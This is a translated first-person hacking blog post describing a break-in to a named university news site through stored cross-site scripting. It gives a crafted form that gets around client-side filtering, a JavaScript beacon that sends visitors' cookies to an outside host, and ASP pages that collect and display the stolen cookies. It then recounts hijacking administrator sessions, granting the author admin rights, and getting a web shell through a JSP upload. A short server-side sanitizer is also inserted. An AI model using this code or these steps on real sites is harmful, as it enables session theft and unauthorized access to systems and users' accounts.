Breaking into a Campus Network with XSS

  Below I describe intrusion via XSS (cross-site scripting). This kind of attack is actually quite common, but it cannot be carried out just by running a tool, so it has never become "mainstream". There are many articles online about cross-site scripting, but most of them stop at popping up an alert box that says "XSS", which in itself means nothing. It is like a program throwing up a memory-error dialog: do you realise that you have just found an overflow bug?
Below I use the campus network at my own school to walk through the attack step by step.

  First, the site's online editor is FCKeditor. When you submit a news item, any SCRIPT tag in it is filtered out, but the filtering happens on the client side, and testing showed that the site does not reject data submitted from outside. So we build a form locally and see whether a <script> tag can be submitted.
<form action="http://42.neusoft.edu.cn/www/publish/PubNews.do.x" method="post" name="theForm" onSubmit="return validator()">
<table width="100%" border="0" cellspacing="0" align="left">
<tr>
<td width="70%" valign="top" id="context">
<div id="pbar">
<img src="images/ico.gif" />
发布到分类:
<select name="cid" id="cid" onchange="Access.hasClassRight('TopicStyle',this.value,accesscallback)">
<option value="0">
请选择文章分类
</option>

<option value="5" >
体育
…….
<option value="193" >
软件
</select>

</div>
<div class="anews">
<div class="title">
<strong style="float:left">文章标题:<textarea name="title" type="text" id="title" size="40" msg="请输入新闻标题"></textarea>
</strong>
<div style="float:left;display:none" id="topicstyle">
</div>
<div>
<div><textarea type="" id="text" name="text" value="dd"></textarea><input type="" id="text___Config" value=""></div>
</div>
<input type="submit" name="Submit" value="确认提交" />
<input type="reset" name="Submit2" value="重新填写" />
</div>
Testing shows that <script> goes through, which opens up a lot of possibilities: planting a trojan, popup bombs, and so on. What we are going to do is grab cookies.
Sites these days generally authenticate users through cookies; if we get the administrator's cookies, we naturally get administrator privileges as well.
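A server-side allowlist filter of the kind the site was missing (only the browser stripped <script>), added here as an example; it is not code from the post. It uses only the Python standard library, and the allowed tag and attribute sets are assumptions chosen for illustration.

```python
# Added example (not from the original post): server-side allowlist filter for
# submitted news bodies. Standard library only; the tag and attribute
# allowlists below are assumptions for illustration, not the site's own rules.
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"p", "br", "b", "i", "strong", "em", "ul", "ol", "li", "a", "img"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt", "width", "height"}}
SAFE_URL_PREFIXES = ("http://", "https://", "/")

class AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0  # >0 inside <script>/<style>: drop their text too

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return  # unknown tag is dropped; its text content is still kept
        kept = []
        for name, value in attrs:
            name, value = name.lower(), value or ""
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, ()):
                continue  # drops onerror=, onload=, style=, id=, ...
            if name in ("href", "src") and not value.strip().lower().startswith(SAFE_URL_PREFIXES):
                continue  # drops javascript:, data:, vbscript: URLs
            kept.append(' %s="%s"' % (name, escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)  # <img ... /> needs no closing tag

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip_depth = max(0, self.skip_depth - 1)
        elif tag in ALLOWED_TAGS and not self.skip_depth:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))  # re-escape text nodes

def sanitize(html_text):  # run on the server after the request arrives
    p = AllowlistSanitizer()
    p.feed(html_text)
    p.close()
    return "".join(p.out)
```

Marking the session cookie HttpOnly is a second, independent layer: document.cookie then does not expose it to injected script, so even a payload that slips past the filter cannot read it.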
The campus site's cookie is structured like this:
userName=*******; password=****************; JSESSIONID=E978968BF9E6008FE48EC8B2AEEBD92C
where userName is the user ID and password is the 32-character MD5 hash of the password...
We do the job with two simple ASP pages and a short piece of JS.

<script language="javascript">
// Create a zero-size image whose src carries the cookie string as a GET parameter
function getURL(s) {
    var image = new Image();
    image.style.width = 0;
    image.style.height = 0;
    image.src = s;
}
getURL("http://www.tianyus.com/42/js.asp?coo=" + encodeURIComponent(document.cookie));
</script>
This code reads the user's cookies and sends them by GET to http://www.tianyus.com/42/js.asp

Next, publish an article with our code inserted:

Now write js.asp, which stores the received cookies in the database
<%
' Open the Access database js.mdb that sits next to this page
Dim cn
Set cn = Server.CreateObject("ADODB.Connection")
cn.Open "DRIVER={Microsoft Access Driver (*.mdb)};" & _
"DBQ=" & Server.MapPath("js.mdb")
' The cookie string arrives in the coo query parameter set by the image beacon
coo = request.QueryString("coo")
cn.execute("insert into [coo](cookies) values('" & coo & "')")
cn.close
set cn = nothing
%>

For convenience we create see.asp to display the collected cookies
<%
Dim cn
Set cn = Server.CreateObject("ADODB.Connection")
cn.Open "DRIVER={Microsoft Access Driver (*.mdb)};" & _
"DBQ=" & Server.MapPath("js.mdb")
%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>无标题文档</title>
</head>
<body>
<table width="760" border="1" cellspacing="4">
<%
set rs = server.CreateObject("adodb.recordset")
rs.open "select * from [coo]", cn, 1
do while not rs.eof
%>
<tr>
<td><%=rs(0)%></td>
<td><%=rs(1)%></td>
</tr>
<%
rs.movenext
loop
%>
<%
rs.close
set rs = nothing
cn.close
set cn = nothing
%>
</table>
</body>
</html>
With that done, I went to bed. I did not get up until almost noon the next day, and found a pile of people's cookies sitting there...
I picked out the administrators' cookies, used them to log in to the site, added my own account to the administrators group, and then created a "network expert" user group for fun. After that I went off to an exam. When I got back in the evening, a bunch of people wanted to add me on QQ.
One of them chatted with me for a while, and I promised to let him know promptly about any vulnerabilities I found in future.

Unexpectedly, the very next day I found an even more serious hole than the one above: the avatar-upload feature would accept any JSP file. Well then, that gave me a web shell directly.
42shell
